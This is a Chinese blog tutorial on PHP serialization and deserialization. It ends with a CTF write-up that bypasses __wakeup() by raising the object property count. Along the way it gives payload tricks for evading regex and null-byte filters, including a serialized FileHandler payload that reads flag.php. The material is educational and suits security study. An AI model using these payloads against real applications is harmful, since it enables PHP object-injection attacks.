php序列化相关

最新推荐文章于 2023-07-13 09:45:00 发布
最新推荐文章于 2023-07-13 09:45:00 发布
阅读量1.8k 收藏 1
点赞数
文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45904256/article/details/119062103
版权
本文详细介绍了PHP中的序列化与反序列化机制,包括序列化后的字符串格式解析、魔术方法的作用,特别是`__wakeup()`在反序列化过程中的应用。通过示例代码展示了如何利用序列化漏洞绕过`__wakeup()`方法,同时提到了序列化字符串中属性计数的漏洞利用方式。此外,还探讨了私有变量在序列化时的表现形式以及一些安全注意事项。
摘要由CSDN通过智能技术生成

1、基础知识

1.1 序列化的展示和解析

<?php
// 将对象序列化
class A{
   public $test = 123;
}
$a = new A;
$a_ser=serialize($a);
echo $a_ser."<br/>";
// 将数组序列化
$b = array('xiaoming','xiaohong','ligang','dongqin');
$b_ser=serialize($b);
echo "$b_ser";echo "<br/>";
//反序列化
$b_unser = unserialize($b_ser);
$a_unser = unserialize($a_ser);
print_r($b_unser);
print_r($a_unser);
?>

结果:

O:1:"A":1:{s:4:"test";i:123;}

a:4:{i:0;s:8:"xiaoming";i:1;s:8:"xiaohong";i:2;s:6:"ligang";i:3;s:7:"dongqin";}

Array ( [0] => xiaoming [1] => xiaohong [2] => ligang [3] => dongqin ) A Object ( [test] => 123 )

序列化后字符串意义解释:

变量类型:类名长度(字节):类名:属性数量:{属性名类型:属性名长度:属性名:属性值类型:属性值长度:属性值内容}

1.2 相关魔术方法

一般两个下划线开头的函数都是魔术方法,所谓魔术无非就是会自动调用而已

__construct():

构造函数,当对象被创建的时候自动调用,对对象进行初始化。但是在unserialize()的时候不会自动调用。可以形象地理解为构造函数便随着对象的生,析构函数便随着对象的死,序列化相当于让对象休眠,反序列化相当于让对象苏醒,所以对象苏醒时会自动调用,苏醒函数即__wakeup()函数,而不会自动调用构造函数。

__destruct():

当对象被销毁时会自动调用。

__wakeup():

unserialize()时会自动调用。

__sleep():

serialize() 时自动调用

__toString():

把类当作字符串使用时触发

打印一个对象时,如果定义了__toString()方法,就能在测试时,通过echo打印对象体,对象就会自动调用它所属类定义的toString方法,格式化输出这个对象所包含的数据。

启发:如果preg_match调用一个类中的变量,如果通过unserialize()将这个变量设为一个类,那么就会调用_toString方法。

__invoke():

当脚本尝试将对象调用为函数时触发

作用:

当尝试以调用函数的方式调用一个对象时,__invoke() 方法会被自动调用。

注意:

本特性只在 PHP 5.3.0 及以上版本有效。

__call()

在对象上下文中调用不可访问的方法时触发

__callStatic()

在静态上下文中调用不可访问的方法时触发

__get()

用于从不可访问的属性读取数据

__set()

用于将数据写入不可访问的属性

__isset()

在不可访问的属性上调用isset()或empty()触发

__unset()

在不可访问的属性上使用unset()时触发

代码理解:

<?php
class ABC{
    public $test;
    function __construct(){
        $test =1;
        echo '调用了构造函数<br>';
    }
    function __destruct(){
        echo '调用了析构函数<br>';
    }
    function __wakeup(){
        echo '调用了苏醒函数<br>';
    }
}
echo '创建对象a<br>';
$a = new ABC;
echo '序列化<br>';
$a_ser=serialize($a);
echo '反序列化<br>';
$a_unser = unserialize($a_ser);
echo '对象快要死了!';
?>

其他魔术方法:
在这里插入图片描述

1.3 序列化的一些注意点(很重要)

1.3.1 变量访问问题

<?php
class Name{
    private $username = 'admin';
    private $password = '100';
    public function __construct($username,$password){
        $username = $username;
        $password = $password;
}
    public function printName(){
        echo $this->username;
        echo '<br>';
        echo $this->password;
    }
}
$s=new Name('123','123');
$s->printName();
?>

**结果:**admin 100

username属性和password属性,因为在类中函数中如果不用this->属性名是访问不到类的属性的。

1.3.2 序列化对象

private变量会被序列化为:%00类名%00变量名

protected变量会被序列化为: %00*%00变量名

public变量会被序列化为:变量名

ps:可以尝试在urlencode(serializa($s))来显示%00

1.3.3 一些绕过

(1)绕过正则匹配

O:4 修改为O:+4 来绕过正则匹配,注意:需要先将+url编码为%2b

不然+会被认为是空格

(2)绕过protected或private中的%00空字符匹配

①PHP7.1以上版本对属性类型不敏感,public属性序列化不会出现不可见字符,可以用public属性来绕过
②private属性序列化的时候会引入两个\x00,注意这两个\x00就是ascii码为0的字符。这个字符显示和输出可能看不到,甚至导致截断,但是url编码后就可以看得很清楚了。同理,protected属性会引入\x00*\x00。此时,为了更加方便进行反序列化Payload的传输与显示,我们可以在序列化内容中用大写S表示字符串,此时这个字符串就支持将后面的字符串用16进制表示。
例如:

O:11:"FileHandler":3:{S:5:"\00*\00op";i:2;S:11:"\00*\00filename";S:8:"flag.php";S:10:"\00*\00content";S:7:"oavinci";}

2. 反序列化__wake()方法绕过

ps:以wp的形式讲解知识点

2.1 题目引入

打开题目,看到一段代码

class xctf{ 
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
?code=

代码审计走起,最重要的是这一个函数function __wakeup(),配合题目unserialize想到PHP的序列化和反序列化

__wakeup()函数用法:

wakeup()是用在反序列化操作中。unserialize()会检查存在一个wakeup()方法。如果存在,则先会调用__wakeup()方法。

<?php
class A{
function __wakeup(){
echo 'Hello';
}
}
$c = new A();
$d=unserialize('O:1:"A":0:{}');
?>

最后页面输出了Hello。在反序列化的时候存在__wakeup()函数,所以最后就会输出Hello

2.2 __wakeup()函数漏洞说明

<?php
class Student{
    public $full_name = 'zhangsan';
    public $score = 150;
    public $grades = array();
    function __wakeup() {
        echo "__wakeup is invoked";
    }
}
$s = new Student();
var_dump(serialize($s));
?>

最后页面上输出的就是Student对象的一个序列化输出:

O:7:"Student":3:{s:9:"full_name";s:8:"zhangsan";s:5:"score";i:150;s:6:"grades";a:0:{}}

其中在Stuedent类后面有一个数字3,整个3表示的就是Student类存在3个属性。

wakeup()漏洞就是与整个属性个数值有关。当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过wakeup的执行。

当我们将上述的序列化的字符串中的对象属性个数修改为5,变为

O:7:"Student":5:{s:9:"full_name";s:8:"zhangsan";s:5:"score";i:150;s:6:"grades";a:0:{}}

最后执行运行的代码如下:

class Student{
public $full_name = 'zhangsan';
public $score = 150;
public $grades = array();
function __wakeup() {
echo "__wakeup is invoked";
}
function __destruct() {
var_dump($this);
}
}
$s = new Student();
$stu = unserialize('O:7:"Student":5:{s:9:"full_name";s:8:"zhangsan";s:5:"score";i:150;s:6:"grades";a:0:{}}');

这样就成功地绕过了__wakeup()函数。

再此题中,我们也需要绕过__weakup函数,结果?code=的提示,需要将序列化之后的值传给code。

首先实例化xctf类并对其使用序列化(这里就实例化xctf类为对象test)

<?php
class xctf{                      //定义一个名为xctf的类
public $flag = '111';            //定义一个公有的类属性$flag,值为111
public function __wakeup(){      //定义一个公有的类方法__wakeup(),输出bad requests后退出当前脚本
exit('bad requests');
}
}
$test = new xctf();           //使用new运算符来实例化该类(xctf)的对象为test
echo(serialize($test));       //输出被序列化的对象(test)
?>

执行结果

O:4:"xctf":1:{s:4:"flag";s:3:"111";}

我们要反序列化xctf类的同时还要绕过wakeup方法的执行(如果不绕过wakeup()方法,那么将会输出bad requests并退出脚本),wakeup()函数漏洞原理:当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过wakeup的执行。因此,需要修改序列化字符串中的属性个数:

当我们将上述的序列化的字符串中的对象属性个数由真实值1修改为2,即如下所示:

O:4:"xctf":2:{s:4:"flag";s:3:"111";}

访问url:http://url?code=O:4:“xctf”:2:{s:4:“flag”;s:3:“111”;}

即可得到flag

ps:当serialize给对象中的私有变量(private前缀)加密时会加上(?Demo?),??不知道,所以当做这种的时候,需要直接在php代码中就将它进行处理。

3.PHP反序列化字符逃逸

4.pop链构造

Mr. Tuu
关注
php序列化中文,php序列化的用法总结(代码示例)
weixin_42315866的博客
03-13 221
序列化可以将数组等保存为数组,此外,它还可用于发送和接收邮件,这样说可能不太好理解,本篇文章我们就来介绍关于php序列化的内容。通常在数据库中存储数组时会发生什么?尝试在数据库中注册以下数组。["student1", "student2", "student3"]然后尝试再次获取它'Array("student1", "student2", "student3")'我们获取到的是字符串,在没有序列...
php 序列化方法,PHP多种序列化/反序列化的方法
weixin_32207033的博客
03-18 243
序列化是将变量转换为可保存或传输的字符串的过程;反序列化就是在适当的时候把这个字符串再转化成原来的变量使用。这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性。1. serialize和unserialize函数这两个是序列化和反序列化PHP中数据的常用函数。$a=array('a'=>'Apple','b'=>'banana','c'=>'Coconut');//序...
关于PHP序列化浅谈
xiaoweids的博客
06-05 277
PHP 中,序列化是将数据结构或对象转换为可以存储或传输的字符串表示的过程。本文将通过一些简单的示例为大家介绍一下PHP序列化相关知识,需要的可以参考一下。
PHP中的一些小细节
qq_41585840的博客
03-30 198
PHP中单引号和双引号的区别? PHP中的单引号和双引号在很多时候都是互通的,但是也存在区别: 1、单引号 其中的内容不会经过解释(\n不会输出为换行,而是直接输出),即内容会与输入的内容一致,例如: <?php $a = 123; echo 'a is $a'; 其输出内容为: a is $a 2、双引号 双引号中的内容将会被解释,即解析内容中的变量,例如: <?php $a =...
【CTF】buuctf web(三)——PHP序列化与反序列化
m0_52923241的博客
08-04 1890
[极客大挑战 2019]PHP 题目类型:序列化与反序列化 这儿提示备份网站,用dirsearch扫一下后台目录 输入:python dirsearch.py -u http://9b76aef7-3183-4da4-a909-0f95ad5b6607.node4.buuoj.cn -e php 找到www.zip,访问一下 跳出弹窗,点击下载 发现有flag.php目录 <?php $flag = 'Syc{dog_dog_dog_dog}'; ?> 无用信息 查看index.php
详解PHP序列化和反序列化原理
10-18
PHP中的魔术方法__sleep和__wakeup是与序列化和反序列化相关的特殊方法。__sleep方法在对象被序列化前调用,可以返回一个数组,数组中包含需要被序列化的属性名,其他属性则会被忽略。__wakeup方法在对象被反序列化...
php json与xml序列化/反序列化
10-26
Web开发中,数据交换和存储常常涉及到对象的序列化和反序列化PHP提供了多种方式来处理这一过程,其中最常用的两种格式是JSON(JavaScript Object Notation)和XML(eXtensible Markup Language)。这两种格式都...
序列化一个类_php的类的序列化脚本_
09-30
### PHP序列化基础 PHP内置的`serialize()`函数是进行对象序列化的工具。当你调用`serialize()`时,它会返回一个表示对象状态的字符串。例如: ```php class MyClass { public $var1 = "Hello"; private $var2 =...
PHP多种序列化/反序列化的方法详解
10-19
WDDX的优势在于其XML结构使得数据可读性强,但相比JSON和PHP序列化,它的使用较少,因为其格式较复杂,且处理速度较慢。 总结: - `serialize` 和 `unserialize` 是PHP中基础且常用的序列化和反序列化工具,适用于...
PHP 序列化和反序列化函数实例详解
12-20
PHP中,序列化和反序列化是两个非常重要的概念,它们主要用于处理复杂的数据结构,如数组、对象等。序列化允许我们将这些数据结构转换为简单的字符串格式,方便存储或传输,而反序列化则能将这些字符串还原为原始...
PHP序列化笔记
jie_a的博客
04-14 128
PHP序列化基础函数魔法函数笔记 基础函数 序列化函数 serialize() 反序列化函数 unserialize() 魔法函数 __construct()当一个对象创建时被调用 __destruct()当一个对象销毁时被调用 __toString()当一个对象被当作一个字符串使用 __sleep() 在对象在被序列化之前运行 __wakeup将在序列化之后立即被调用 笔记 绕过wakeup的执行(CVE-2016-7124):当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过wakeu
PHP序列化漏洞解析
weixin_43749601的博客
10-31 713
<?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; //%00*%00属性名 protected $filename; protected $content; function __construct() { //该方法在创建对象时自动调用 $op = "1"; $filename = "/tmp/tm
攻防世界--unserialize3 fileinclude
tzyyyyyy的博客
02-06 708
攻防世界--unserialize3 fileinclude
浅谈PHP序列化漏洞原理
ting2909的博客
09-25 716
序列化用途:方便于对象在网络中的传输和存储 1|10x01 php序列化漏洞 在PHP应用中,序列化和反序列化一般用做缓存,比如session缓存,cookie等。 常见的序列化格式: 二进制格式 字节数组 json字符串 xml字符串 序列化就是将对象转换为流,利于储存和传输的格式 反序列化序列化相反,将流转换为对象 例如:json序列化、XML序列化、二进制序列化、SOAP序列化php...
PHP序列化和反序列化入门
最新发布
2301_77342543的博客
07-13 2046
serialize() //将一个对象转换成一个字符串unserialize() //将字符串还原成一个对象通过序列化与反序列化我们可以很方便的在PHP中进行对象的传递。本质上反序列化是没有危害的。但是如果用户对数据可控那就可以利用反序列化构造payload攻击php//实例化一个对象?返回结果s:4:"name";s:3:"age";s:2:"18";O代表对象,这里是序列化的一个对象,要序列化数组的就用A6表示的是类的长度sunset表示对是类名。
PHP序列化-unserialize3(攻防世界)
Curry197的博客
05-31 659
题目: class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 解题思路: wakeup()函数是在对象被反序列化之后被调用 但是这题如果这个函数被调用,那么程序就退出了,所以需要想办法绕过这个函数。 绕过wakeup函数执行 wakeup()有个执行漏洞:一个字符串或对象被序列化后,如果其属性被修改,则不会执行wakeup()函数,这算是一个绕过点 只要序
攻防世界Web(难度1)
weixin_59453707的博客
08-30 489
将对象的状态信息转换为可以存储或传输的形式的过程,简单来说,就是将状态信息保存为字符串将字符串转换为状态信息PHP内的几个特殊魔术方法__construct():当对象创建(new)时会自动调用,但在unserialize()时是不会自动调用的(构造函数)__destruct():当对象操作执行完毕后自动执行destruct()函数的代码。...
攻防世界复习web进阶(3)
LGXJM20的博客
11-03 226
unserialize3解题思路 描述:无 思路:打开页面是一段代码,代码审计走起,最重要的是这一个函数function __wakeup(),配合题目unserialize想到PHP序列化和反序列化 php序列化:执行unserialize()时,先会调用__wakeup(),当序列化字符串中属性值个数大于属性个数,就会导致反序列化异常,从而跳过__wakeup()。 解题方法: <?php class xctf{ public $flag = '11
php魔法函数
Kr的博客
01-18 3194
发现在ctf中,关于PHP几大魔法函数的考点还是很多的,也是很基础的,也有很多的安全问题也是这些魔法函数造成的,简单记录一下关于魔法函数的理解以及在发现安全过程中遇到后怎么进行绕过。    1、__wakeup() __wakeup()是在反序列化操作中起作用的魔法函数,当unserialize的时候,会检查时候存在__wakeup()函数,如果存在的话,会优先调用__wakeup()函数。...
深入理解PHP序列化机制
PHP序列化常用于将内存中的数据持久化到文件或数据库中,以便在后续的程序执行中再次使用。例如,session管理就使用了序列化来存储用户的会话数据。 ```php file_put_contents('./data.txt', $s); $dataFromFile = ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值